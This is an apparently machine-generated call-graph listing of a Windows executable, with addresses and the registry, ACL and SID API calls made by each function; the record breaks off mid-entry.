7ff686857225 ctype 41552->41557 41558 7ff686857257 ctype 41553->41558 41559 7ff68685724f LocalFree 41553->41559 41560 7ff686862180 _handle_errorf 8 API calls 41554->41560 41556 7ff686857fed 41555->41556 41564 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41556->41564 41785 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41557->41785 41567 7ff68685726b IsValidSecurityDescriptor 41558->41567 41568 7ff686857347 GetLastError 41558->41568 41559->41558 41562 7ff6868576f8 41560->41562 41563 7ff686857ef9 ISource 41563->41539 41569 7ff686857fdc 41563->41569 41570 7ff686857fe1 41563->41570 41584 7ff686858005 41563->41584 41571 7ff686857ff3 41564->41571 41565 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41572 7ff68685800b 41565->41572 41567->41568 41576 7ff68685727d ISource 41567->41576 41568->41576 41573 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41569->41573 41574 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41570->41574 41575 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41571->41575 41573->41570 41574->41548 41577 7ff686857ff9 41575->41577 41576->41519 41576->41537 41578 7ff68685743a 41576->41578 41801 7ff686829910 41577->41801 41795 7ff6868688fc 41578->41795 41580->41534 41584->41565 41586 7ff68684a42e 41585->41586 41804 7ff68683c460 41586->41804 41593 7ff68684a5e9 41594 7ff686833f80 35 API calls 41593->41594 41623 7ff68684a591 ISource 41593->41623 41594->41623 41595 7ff68684a48d 41598 7ff68684b512 41595->41598 41601 7ff686833f80 35 API calls 41595->41601 41596 7ff68684a64c 41599 7ff686833f80 35 API calls 41596->41599 41597 7ff68684a664 41600 7ff686833f80 35 API calls 41597->41600 42143 7ff686834230 31 API calls 2 library calls 41598->42143 41620 7ff68684a65f ISource 41599->41620 41603 7ff68684a68e ISource 41600->41603 41615 7ff68684a4fa ISource 41601->41615 41605 7ff68684b703 41603->41605 41608 7ff68684b6fe 41603->41608 41610 7ff686833f80 35 API calls 41603->41610 41604 7ff68684b6b4 42144 7ff686834230 31 API calls 2 library calls 41604->42144 41609 7ff686829910 33 API calls 41605->41609 41607 7ff686860c18 13 API calls 41639 7ff68684a788 41607->41639 41612 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41608->41612 41613 7ff68684b709 41609->41613 41614 7ff68684a72c 41610->41614 41611 7ff68684b6be 42145 7ff686834230 31 API calls 2 library calls 41611->42145 41612->41605 41619 7ff686829520 35 API calls 41613->41619 41614->41608 41614->41620 41615->41605 41615->41608 41617 7ff686833f80 35 API calls 41615->41617 41617->41623 41618 7ff68684b6c8 42146 7ff686834230 31 API calls 2 library calls 41618->42146 41622 7ff68684b76e 41619->41622 41620->41607 41823 7ff68684bc40 41622->41823 41623->41596 41623->41597 41623->41608 41624 7ff68684b6d2 41625 7ff686862180 _handle_errorf 8 API calls 41624->41625 41626 7ff68684b6e3 41625->41626 41626->41510 41628 7ff68684a840 41630 7ff686860c18 13 API calls 41628->41630 41647 7ff68684aa87 41628->41647 41676 7ff68684a8a5 41630->41676 41631 7ff68684a350 245 API calls 41632 7ff68684b7ad 41631->41632 41686 7ff68684bb51 ISource 41632->41686 42147 7ff6868621d4 41632->42147 41633 7ff68684bc26 41638 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41633->41638 41634 7ff686862180 _handle_errorf 8 API calls 41637 7ff68684bc06 41634->41637 41635 7ff68682c870 70 API calls 41635->41639 41637->41510 41643 7ff68684bc2c 41638->41643 41639->41628 41639->41635 41640 7ff68684b7c9 memcpy_s 41645 7ff68684b7eb RegEnumKeyExW 41640->41645 41641 7ff68684ab9b 41644 7ff686860c18 13 API calls 41641->41644 41642 7ff68684ab79 41646 7ff686833f80 35 API calls 41642->41646 41648 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41643->41648 41697 7ff68684aba2 41644->41697 41671 7ff68684b81f ISource 41645->41671 41748 7ff68684ab8f Concurrency::details::SchedulerBase::GetBitSet SimpleUString::operator= 41646->41748 41647->41641 41647->41642 41650 7ff68684bc32 41648->41650 41649 7ff68684b920 41652 7ff68684b9df 41649->41652 41653 7ff68684b930 41649->41653 41655 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41650->41655 41651 7ff68682c870 70 API calls 41651->41676 41658 7ff68684b9eb RegCloseKey 41652->41658 41699 7ff68684b9f1 ISource 41652->41699 41656 7ff68684b93c 41653->41656 41657 7ff68684b935 RegCloseKey 41653->41657 41654 7ff68684a960 41654->41647 41660 7ff686860c18 13 API calls 41654->41660 41661 7ff68684bc38 41655->41661 41663 7ff68684b971 ISource 41656->41663 41672 7ff68684bc21 41656->41672 41657->41656 41658->41699 41707 7ff68684a9c5 41660->41707 42219 7ff686833e30 33 API calls 41661->42219 41662 7ff686833f80 35 API calls 41662->41671 42154 7ff686829720 31 API calls 2 library calls 41663->42154 41664 7ff68684bb05 41667 7ff68684bb3c ISource 41664->41667 41664->41672 41665 7ff68684b488 42133 7ff686829420 31 API calls 2 library calls 41665->42133 41666 7ff68684b4a0 41690 7ff68684b4eb 41666->41690 42135 7ff686829cb0 35 API calls 41666->42135 42217 7ff686829720 31 API calls 2 library calls 41667->42217 41671->41643 41671->41649 41671->41662 41684 7ff68684b8e6 RegEnumKeyExW 41671->41684 42153 7ff686830360 35 API calls 3 library calls 41671->42153 41678 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41672->41678 41673 7ff68684b986 41673->41633 41685 7ff68684b9be ISource 41673->41685 41675 7ff68684b497 42134 7ff686834230 31 API calls 2 library calls 41675->42134 41676->41651 41676->41654 41678->41633 41683 7ff68684ac60 41688 7ff686860c18 13 API calls 41683->41688 41703 7ff68684aea7 41683->41703 41684->41671 41685->41634 41686->41633 41686->41685 42218 7ff686829720 31 API calls 2 library calls 41686->42218 41687 7ff68684b4d5 42136 7ff686834230 31 API calls 2 library calls 41687->42136 41721 7ff68684acc5 41688->41721 41690->41598 41691 7ff68684b54c 41690->41691 41696 7ff68684b526 RegConnectRegistryW 41690->41696 41698 7ff68684b55f RegOpenKeyExW 41691->41698 41693 7ff68682c870 70 API calls 41693->41707 41695 7ff68682c870 70 API calls 41695->41697 41696->41598 41696->41691 41697->41683 41697->41695 41702 7ff68684b58b 41698->41702 41699->41650 41699->41661 41699->41664 42155 7ff68682aa20 41699->42155 42166 7ff68682ac70 41699->42166 42171 7ff68684b710 41699->42171 41700 7ff68684afbb 41705 7ff686860c18 13 API calls 41700->41705 41701 7ff68684af99 41704 7ff686833f80 35 API calls 41701->41704 41706 7ff68684b676 41702->41706 41709 7ff68684b5a7 RegCreateKeyExW 41702->41709 41703->41700 41703->41701 41704->41748 41729 7ff68684afc2 41705->41729 41706->41598 41708 7ff68684b68e RegCloseKey 41706->41708 41707->41647 41707->41693 41708->41598 41711 7ff68684b5e6 41709->41711 41712 7ff68684b652 41709->41712 41710 7ff68684ad80 41710->41703 41713 7ff686860c18 13 API calls 41710->41713 42137 7ff686829cb0 35 API calls 41711->42137 41712->41706 41715 7ff68684b65f RegCloseKey 41712->41715 41738 7ff68684ade5 41713->41738 41715->41706 41716 7ff68684b5f9 42138 7ff686829d20 35 API calls 41716->42138 41718 7ff68684b60d 42139 7ff6868294c0 35 API calls 41718->42139 41719 7ff68682c870 70 API calls 41719->41721 41721->41710 41721->41719 41722 7ff68684b620 42140 7ff686834230 31 API calls 2 library calls 41722->42140 41723 7ff68684b080 41724 7ff686860c18 13 API calls 41723->41724 41731 7ff68684b2c0 Concurrency::details::SchedulerBase::GetBitSet 41723->41731 41746 7ff68684b0e5 41724->41746 41726 7ff68682c870 70 API calls 41726->41729 41727 7ff68684b637 42141 7ff686834230 31 API calls 2 library calls 41727->42141 41728 7ff68682c870 70 API calls 41728->41738 41729->41723 41729->41726 41733 7ff686860c18 13 API calls 41731->41733 41731->41748 41732 7ff68684b641 42142 7ff686834230 31 API calls 2 library calls 41732->42142 41735 7ff68684b386 41733->41735 42129 7ff686829b00 70 API calls 41735->42129 41737 7ff68684b3aa 41741 7ff686860c18 13 API calls 41737->41741 41737->41748 41738->41703 41738->41728 41739 7ff68684b1a0 41739->41731 41740 7ff686860c18 13 API calls 41739->41740 41752 7ff68684b205 41740->41752 41742 7ff68684b3b5 41741->41742 42130 7ff686829b00 70 API calls 41742->42130 41744 7ff68684b3d9 41747 7ff686860c18 13 API calls 41744->41747 41744->41748 41745 7ff68682c870 70 API calls 41745->41746 41746->41739 41746->41745 41749 7ff68684b3e4 41747->41749 41748->41598 41748->41666 42132 7ff686829d90 35 API calls 41748->42132 42131 7ff686829b00 70 API calls 41749->42131 41751 7ff68682c870 70 API calls 41751->41752 41752->41731 41752->41751 41758 7ff686833fb0 ctype 41754->41758 41760 7ff686833ff9 41754->41760 41755 7ff686834110 42311 7ff686833e30 33 API calls 41755->42311 41757 7ff68683401b 41761 7ff68683410a Concurrency::cancel_current_task 41757->41761 41762 7ff6868621d4 std::_Facet_Register 5 API calls 41757->41762 41758->41490 41760->41755 41760->41757 41760->41761 41763 7ff686834094 41760->41763 41761->41755 41767 7ff686834081 ISource ctype 41762->41767 41764 7ff6868621d4 std::_Facet_Register 5 API calls 41763->41764 41763->41767 41764->41767 41765 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41766 7ff686834109 41765->41766 41766->41761 41767->41765 41768->41524 41770 7ff68682954d 41769->41770 41771 7ff68682960c Concurrency::cancel_current_task 41770->41771 41773 7ff6868295c6 41770->41773 41774 7ff68682959f 41770->41774 41779 7ff68682955b ctype 41770->41779 42312 7ff686828e00 31 API calls 2 library calls 41771->42312 41777 7ff6868621d4 std::_Facet_Register 5 API calls 41773->41777 41773->41779 41774->41771 41776 7ff6868621d4 std::_Facet_Register 5 API calls 41774->41776 41775 7ff686829634 ISource 41775->41517 41778 7ff6868295b0 41776->41778 41777->41779 41778->41779 41780 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41778->41780 41779->41517 41781 7ff68682960b 41780->41781 41781->41771 41782->41542 41783->41550 41784->41547 41785->41553 41787 7ff686862189 41786->41787 41788 7ff68685741f 41787->41788 41789 7ff686862b14 IsProcessorFeaturePresent 41787->41789 41790 7ff686862b2c 41789->41790 42313 7ff686862d08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41790->42313 41792 7ff686862b3f 42314 7ff686862ae0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41792->42314 42315 7ff68686882c 31 API calls 2 library calls 41795->42315 41797 7ff686868915 42316 7ff68686892c 17 API calls _invalid_parameter_noinfo_noreturn 41797->42316 41800->41563 42317 7ff686861034 33 API calls _com_raise_error 41801->42317 41805 7ff68683c48e ctype 41804->41805 42220 7ff68683c5b0 41805->42220 41807 7ff686862180 _handle_errorf 8 API calls 41809 7ff68683c594 41807->41809 41808 7ff68683c519 ISource ctype 41808->41807 41810 7ff686860c18 41809->41810 42224 7ff68686125c 41810->42224 41812 7ff686860c3a 41818 7ff686860c5d ctype 41812->41818 42232 7ff686860e14 5 API calls std::_Facet_Register 41812->42232 41814 7ff686860c52 42233 7ff686860e44 EncodePointer std::locale::_Setgloballocale 41814->42233 41817 7ff68684a44a 41819 7ff6868544d0 41817->41819 42228 7ff6868612d4 41818->42228 41822 7ff6868544ff 41819->41822 41820 7ff68682c870 70 API calls 41820->41822 41821 7ff68684a45d 41821->41593 41821->41595 41822->41820 41822->41821 41824 7ff68684bd43 IsValidSid 41823->41824 41825 7ff68684bd59 41823->41825 41824->41825 41826 7ff68684bd4d 41824->41826 41828 7ff68684bd7c IsValidSid 41825->41828 41829 7ff68684bd92 41825->41829 42255 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41826->42255 41828->41829 41830 7ff68684bd86 41828->41830 41832 7ff686829520 35 API calls 41829->41832 41884 7ff68684c031 ISource 41829->41884 42256 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41830->42256 41834 7ff68684bdbf 41832->41834 41833 7ff686829520 35 API calls 41835 7ff68684c0e9 41833->41835 41836 7ff686829520 35 API calls 41834->41836 42235 7ff686844440 41835->42235 41838 7ff68684bdd3 41836->41838 41842 7ff68683c460 8 API calls 41838->41842 41839 7ff68684e472 42294 7ff686833e30 33 API calls 41839->42294 41840 7ff68684e45a 42293 7ff686833e30 33 API calls 41840->42293 41847 7ff68684be2b 41842->41847 41845 7ff68682aa20 35 API calls 41850 7ff68684c36f 41845->41850 41846 7ff68684e478 41853 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41846->41853 41858 7ff68683c460 8 API calls 41847->41858 41848 7ff68682aa20 35 API calls 41851 7ff68684c14b 41848->41851 41849 7ff68684e460 41855 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41849->41855 41852 7ff68682ac70 35 API calls 41850->41852 41854 7ff68682ac70 35 API calls 41851->41854 41856 7ff68684c38b 41852->41856 41857 7ff68684e47e 41853->41857 41859 7ff68684c165 41854->41859 41860 7ff68684e466 41855->41860 41861 7ff686833f80 35 API calls 41856->41861 41864 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41857->41864 41862 7ff68684be7a 41858->41862 41863 7ff686833f80 35 API calls 41859->41863 41866 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41860->41866 41889 7ff68684c3eb ISource 41861->41889 41865 7ff686860c18 13 API calls 41862->41865 41876 7ff68684c1c2 ISource ctype 41863->41876 41867 7ff68684e484 41864->41867 41868 7ff68684be84 41865->41868 41869 7ff68684e46c 41866->41869 41870 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41867->41870 42257 7ff686835cf0 70 API calls 41868->42257 41871 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41869->41871 41872 7ff68684e48a 41870->41872 41871->41839 42295 7ff686833e30 33 API calls 41872->42295 41875 7ff68684e490 41878 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41875->41878 41876->41849 41876->41860 41876->41869 42260 7ff686856970 33 API calls 4 library calls 41876->42260 41881 7ff68684e496 41878->41881 41879 7ff68684c2de 42261 7ff686856970 33 API calls 4 library calls 41879->42261 41880 7ff68684beb8 41880->41884 41891 7ff68684beeb ISource ctype 41880->41891 41885 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41881->41885 41883 7ff68684c2e8 41883->41839 41883->41845 42005 7ff68684c00f ISource 41883->42005 42128 7ff68684e424 41883->42128 41884->41833 41886 7ff68684e454 41884->41886 41918 7ff68684e44e 41884->41918 41888 7ff68684e49c 41885->41888 41890 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41886->41890 41887 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41887->41886 41895 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41888->41895 41889->41846 41889->41857 41889->41867 41889->41889 41898 7ff686829520 35 API calls 41889->41898 41890->41840 41891->41886 41891->41918 42258 7ff686856970 33 API calls 4 library calls 41891->42258 41892 7ff686862180 _handle_errorf 8 API calls 41894 7ff68684b779 41892->41894 41894->41631 41894->41686 41899 7ff68684e4a2 41895->41899 41896 7ff68684bfcc 42259 7ff686856970 33 API calls 4 library calls 41896->42259 41897 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41901 7ff68684e42a 41897->41901 41902 7ff68684c803 41898->41902 41904 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41899->41904 41905 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41901->41905 41908 7ff68684c83b 41902->41908 41909 7ff68684cd69 41902->41909 41903 7ff68684bfd6 41910 7ff68684e448 41903->41910 41903->42005 41906 7ff68684e4a8 41904->41906 41907 7ff68684e430 41905->41907 41915 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41906->41915 41911 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41907->41911 41913 7ff68684cadc 41908->41913 41914 7ff68684c84f 41908->41914 41919 7ff686829520 35 API calls 41909->41919 42012 7ff68684cdc2 ISource ctype 41909->42012 41912 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41910->41912 41916 7ff68684e436 41911->41916 41912->41918 42264 7ff68683bf60 45 API calls 4 library calls 41913->42264 42262 7ff68683bf60 45 API calls 4 library calls 41914->42262 41921 7ff68684e4ae 41915->41921 41929 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41916->41929 41918->41887 41924 7ff68684cda9 41919->41924 42296 7ff686833e30 33 API calls 41921->42296 41922 7ff68684d0de 41933 7ff68684d1a2 41922->41933 41934 7ff68684d110 GetAclInformation 41922->41934 42015 7ff68684d272 41922->42015 41923 7ff68684cae1 41923->41921 41939 7ff68682aa20 35 API calls 41923->41939 42266 7ff6868350c0 73 API calls 3 library calls 41924->42266 41925 7ff68684c854 41925->41872 41938 7ff68682aa20 35 API calls 41925->41938 41927 7ff68684cf6c GetAclInformation 41936 7ff68684cf8b GetLastError 41927->41936 41952 7ff68684cf9f 41927->41952 41928 7ff68684ce3c 41928->41922 41949 7ff68684d02b GetAclInformation 41928->41949 41932 7ff68684e43c 41929->41932 41931 7ff68684e4b4 41943 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41931->41943 41947 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41932->41947 41948 7ff68684d1d3 GetAclInformation 41933->41948 41933->42015 41941 7ff68684d12c GetLastError 41934->41941 41970 7ff68684d140 41934->41970 41935 7ff68684cdba 41945 7ff686829520 35 API calls 41935->41945 41935->42012 41937 7ff68684e354 LocalFree LocalFree 41936->41937 41955 7ff68684e377 ctype 41937->41955 41944 7ff68684c8a6 41938->41944 41950 7ff68684cb33 41939->41950 41940 7ff68684d2b8 GetAclInformation 41951 7ff68684d2d7 GetLastError 41940->41951 41983 7ff68684d2eb 41940->41983 41941->41937 41942 7ff68684cfc0 GetAce 41942->41936 41942->41952 41953 7ff68684e4ba 41943->41953 41954 7ff68682ac70 35 API calls 41944->41954 41945->42012 41946 7ff68684d38a GetAclInformation 41956 7ff68684d3a8 GetLastError 41946->41956 41987 7ff68684d3bc 41946->41987 41957 7ff68684e442 41947->41957 41958 7ff68684d1ef GetLastError 41948->41958 42014 7ff68684d203 41948->42014 41959 7ff68684d047 GetLastError 41949->41959 42016 7ff68684d06f 41949->42016 41960 7ff68682ac70 35 API calls 41950->41960 41951->41937 41952->41928 41952->41942 41963 7ff68684cfdf DeleteAce 41952->41963 41973 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41953->41973 41964 7ff68684c8c0 41954->41964 42291 7ff686856970 33 API calls 4 library calls 41955->42291 41956->41937 41975 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41957->41975 41958->41937 41959->41937 41966 7ff68684cb4d 41960->41966 41961 7ff68684d44c 41968 7ff68684d47e 41961->41968 42044 7ff68684c937 ISource ctype 41961->42044 42270 7ff686859d50 69 API calls 4 library calls 41961->42270 41962 7ff68684d160 GetAce 41962->41936 41962->41970 41963->41952 41972 7ff68684d05b GetLastError 41963->41972 42263 7ff68683a1f0 33 API calls 41964->42263 42265 7ff68683a1f0 33 API calls 41966->42265 41967 7ff68684d382 41967->41961 42269 7ff686859d50 69 API calls 4 library calls 41967->42269 41982 7ff68684d59d ctype 41968->41982 41990 7ff68684d4b2 41968->41990 41968->42044 42271 7ff686859830 50 API calls 2 library calls 41968->42271 41969 7ff68684d300 GetAce 41969->41936 41969->41983 41970->41933 41970->41962 41971 7ff68684d183 DeleteAce 41970->41971 41971->41970 41971->41972 41972->41937 41984 7ff68684e4c0 41973->41984 41975->41910 41976 7ff68684e397 42292 7ff686856970 33 API calls 4 library calls 41976->42292 41977 7ff68684d3d0 GetAce 41977->41936 41977->41987 41978 7ff68684d220 GetAce 41978->41936 41978->42014 41979 7ff68684d090 GetAce 41979->41936 41979->42016 41993 7ff68684d5f7 41982->41993 42023 7ff68684d7ac ctype 41982->42023 42276 7ff686858360 156 API calls 4 library calls 41982->42276 41983->41969 41991 7ff68684d32b DeleteAce 41983->41991 41992 7ff68684d2ae 41983->41992 42003 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41984->42003 41987->41967 41987->41977 41996 7ff68684d3fb DeleteAce 41987->41996 41990->41982 42001 7ff68684d4e3 41990->42001 41990->42044 42272 7ff686859830 50 API calls 2 library calls 41990->42272 41991->41972 41991->41983 41992->41946 41992->41967 41993->42023 41993->42044 42055 7ff68684d628 41993->42055 42277 7ff686858360 156 API calls 4 library calls 41993->42277 41995 7ff68684e3a1 41995->41957 41995->42005 41996->41972 41996->41987 42001->41982 42001->42044 42273 7ff686859b10 13 API calls ctype 42001->42273 42007 7ff68684e4c6 42003->42007 42004 7ff68684d942 SetEntriesInAclW 42008 7ff68684d964 42004->42008 42009 7ff68684dc10 SetEntriesInAclW 42004->42009 42005->41892 42022 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42007->42022 42008->42044 42280 7ff68683bf60 45 API calls 4 library calls 42008->42280 42017 7ff68684dc36 42009->42017 42018 7ff68684dee2 42009->42018 42010 7ff68684d253 DeleteAce 42010->41972 42010->42014 42011 7ff68684d0c3 DeleteAce 42011->41972 42011->42016 42012->41901 42012->41922 42012->41927 42012->41928 42014->41978 42014->42010 42014->42015 42268 7ff6868539c0 13 API calls _handle_errorf 42014->42268 42015->41940 42015->41992 42016->41922 42016->41979 42016->42011 42267 7ff6868539c0 13 API calls _handle_errorf 42016->42267 42017->42044 42282 7ff68683bf60 45 API calls 4 library calls 42017->42282 42019 7ff68684dfa4 42018->42019 42020 7ff68684def1 42018->42020 42033 7ff68684dfd8 42019->42033 42034 7ff68684dfc3 IsValidSid 42019->42034 42086 7ff68684df9f 42019->42086 42025 7ff68684df1a 42020->42025 42026 7ff68684df05 IsValidSid 42020->42026 42028 7ff68684e4cc 42022->42028 42023->42004 42023->42044 42038 7ff68684df4b 42025->42038 42039 7ff68684df36 IsValidSid 42025->42039 42026->42025 42032 7ff68684df12 42026->42032 42027 7ff68684d527 42027->42044 42047 7ff68684d541 IsValidSid 42027->42047 42061 7ff68684d554 ctype 42027->42061 42040 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42028->42040 42029 7ff68684d739 42045 7ff68684d74c IsValidSid 42029->42045 42046 7ff68684d75f ctype 42029->42046 42030 7ff68684d97e 42036 7ff68684e4d2 42030->42036 42056 7ff68682aa20 35 API calls 42030->42056 42284 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42032->42284 42052 7ff68684e009 42033->42052 42053 7ff68684dff4 IsValidSid 42033->42053 42034->42033 42042 7ff68684dfd0 42034->42042 42035 7ff68684dc50 42043 7ff68684e4f0 42035->42043 42063 7ff68682aa20 35 API calls 42035->42063 42297 7ff686833e30 33 API calls 42036->42297 42062 7ff686829520 35 API calls 42038->42062 42039->42038 42048 7ff68684df43 42039->42048 42040->42036 42287 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42042->42287 42298 7ff686833e30 33 API calls 42043->42298 42044->41875 42044->41881 42044->41888 42044->41899 42044->41906 42044->41931 42044->41937 42044->41953 42044->41984 42044->42007 42044->42028 42045->42046 42057 7ff68684d756 42045->42057 42046->42023 42058 7ff68684d799 IsValidSid 42046->42058 42059 7ff68684d54b 42047->42059 42047->42061 42285 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42048->42285 42077 7ff686829520 35 API calls 42052->42077 42053->42052 42065 7ff68684e001 42053->42065 42055->42023 42055->42029 42055->42044 42067 7ff686859200 118 API calls 42055->42067 42068 7ff68684d9d2 42056->42068 42278 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42057->42278 42058->42023 42070 7ff68684d7a3 42058->42070 42274 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42059->42274 42061->41982 42074 7ff68684d58a IsValidSid 42061->42074 42073 7ff68684df74 42062->42073 42075 7ff68684dca4 42063->42075 42288 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42065->42288 42066 7ff68684e09e 42078 7ff68684e50e 42066->42078 42093 7ff68682aa20 35 API calls 42066->42093 42067->42055 42079 7ff68682ac70 35 API calls 42068->42079 42279 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42070->42279 42286 7ff686858010 37 API calls 4 library calls 42073->42286 42074->41982 42083 7ff68684d594 42074->42083 42084 7ff68682ac70 35 API calls 42075->42084 42077->42086 42299 7ff686833e30 33 API calls 42078->42299 42088 7ff68684d9ea 42079->42088 42275 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 42083->42275 42090 7ff68684dcbc 42084->42090 42086->42044 42289 7ff68683bf60 45 API calls 4 library calls 42086->42289 42281 7ff68683a1f0 33 API calls 42088->42281 42283 7ff68683a1f0 33 API calls 42090->42283 42097 7ff68684e0f0 42093->42097 42103 7ff68682ac70 35 API calls 42097->42103 42108 7ff68684e10a 42103->42108 42290 7ff68683a1f0 33 API calls 42108->42290 42128->41897 42129->41737 42130->41744 42131->41748 42132->41665 42133->41675 42134->41666 42135->41687 42136->41690 42137->41716 42138->41718 42139->41722 42140->41727 42141->41732 42142->41598 42143->41604 42144->41611 42145->41618 42146->41624 42151 7ff6868621df 42147->42151 42148 7ff6868621f8 42148->41640 42150 7ff68686220a Concurrency::cancel_current_task 42150->42151 42151->42147 42151->42148 42151->42150 42303 7ff6868724d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42151->42303 42304 7ff686860ff0 RtlPcToFileHeader RaiseException _com_raise_error Concurrency::cancel_current_task 42151->42304 42153->41671 42154->41673 42156 7ff68682aa72 42155->42156 42159 7ff68682aad9 ctype 42155->42159 42157 7ff68682aa87 42156->42157 42158 7ff68682ab53 Concurrency::cancel_current_task 42156->42158 42160 7ff68682aae7 42156->42160 42157->42158 42161 7ff6868621d4 std::_Facet_Register 5 API calls 42157->42161 42159->41699 42160->42159 42163 7ff6868621d4 std::_Facet_Register 5 API calls 42160->42163 42162 7ff68682aad4 42161->42162 42162->42159 42164 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42162->42164 42163->42159 42165 7ff68682ab52 42164->42165 42165->42158 42167 7ff68682accf 42166->42167 42170 7ff68682ac8c ctype 42166->42170 42305 7ff68682bff0 35 API calls 4 library calls 42167->42305 42169 7ff68682ace2 42169->41699 42170->41699 42172 7ff686829520 35 API calls 42171->42172 42173 7ff68684b76e 42172->42173 42216 7ff68684bc40 240 API calls 42173->42216 42174 7ff68684b779 42177 7ff68684a350 250 API calls 42174->42177 42213 7ff68684bb51 ISource 42174->42213 42176 7ff68684b986 42179 7ff68684b9be ISource 42176->42179 42209 7ff68684bc26 42176->42209 42178 7ff68684b7ad 42177->42178 42181 7ff6868621d4 std::_Facet_Register 5 API calls 42178->42181 42178->42213 42180 7ff686862180 _handle_errorf 8 API calls 42179->42180 42182 7ff68684bc06 42180->42182 42184 7ff68684b7c9 memcpy_s 42181->42184 42182->41699 42183 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42185 7ff68684bc2c 42183->42185 42186 7ff68684b7eb RegEnumKeyExW 42184->42186 42187 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42185->42187 42211 7ff68684b81f ISource 42186->42211 42189 7ff68684bc32 42187->42189 42188 7ff68684b920 42190 7ff68684b9df 42188->42190 42191 7ff68684b930 42188->42191 42192 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42189->42192 42195 7ff68684b9eb RegCloseKey 42190->42195 42215 7ff68684b9f1 ISource 42190->42215 42193 7ff68684b93c 42191->42193 42194 7ff68684b935 RegCloseKey 42191->42194 42196 7ff68684bc38 42192->42196 42198 7ff68684b971 ISource 42193->42198 42204 7ff68684bc21 42193->42204 42194->42193 42195->42215 42310 7ff686833e30 33 API calls 42196->42310 42197 7ff686833f80 35 API calls 42197->42211 42307 7ff686829720 31 API calls 2 library calls 42198->42307 42199 7ff68684bb05 42200 7ff68684bb3c ISource 42199->42200 42199->42204 42308 7ff686829720 31 API calls 2 library calls 42200->42308 42206 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 42204->42206 42206->42209 42208 7ff68682aa20 35 API calls 42208->42215 42209->42183 42210 7ff68684b8e6 RegEnumKeyExW 42210->42211 42211->42185 42211->42188 42211->42197 42211->42210 42306 7ff686830360 35 API calls 3 library calls 42211->42306 42212 7ff68682ac70 35 API calls 42212->42215 42213->42179 42213->42209 42309 7ff686829720 31 API calls 2 library calls 42213->42309 42214 7ff68684b710 250 API calls 42214->42215 42215->42189 42215->42196 42215->42199 42215->42208 42215->42212 42215->42214 42216->42174 42217->41686 42218->41673 42221 7ff68683c603 ISource ctype 42220->42221 42222 7ff686862180 _handle_errorf 8 API calls 42221->42222 42223 7ff68683c6f2 42222->42223 42223->41808 42225 7ff68686126b 42224->42225 42226 7ff686861270 42224->42226 42234 7ff68686f2d4 6 API calls std::_Locinfo::_Locinfo_ctor 42225->42234 42226->41812 42229 7ff6868612df LeaveCriticalSection 42228->42229 42231 7ff6868612e8 42228->42231 42231->41817 42232->41814 42233->41818 42236 7ff686860c18 13 API calls 42235->42236 42237 7ff686844487 42236->42237 42249 7ff6868444da ISource 42237->42249 42300 7ff68682c870 70 API calls 4 library calls 42237->42300 42239 7ff6868446df 42240 7ff686844716 ISource 42239->42240 42254 7ff6868447fd 42239->42254 42242 7ff686862180 _handle_errorf 8 API calls 42240->42242 42241 7ff686860c18 13 API calls 42241->42249 42243 7ff68684473c 42242->42243 42243->41840 42243->41848 42243->41883 42244 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 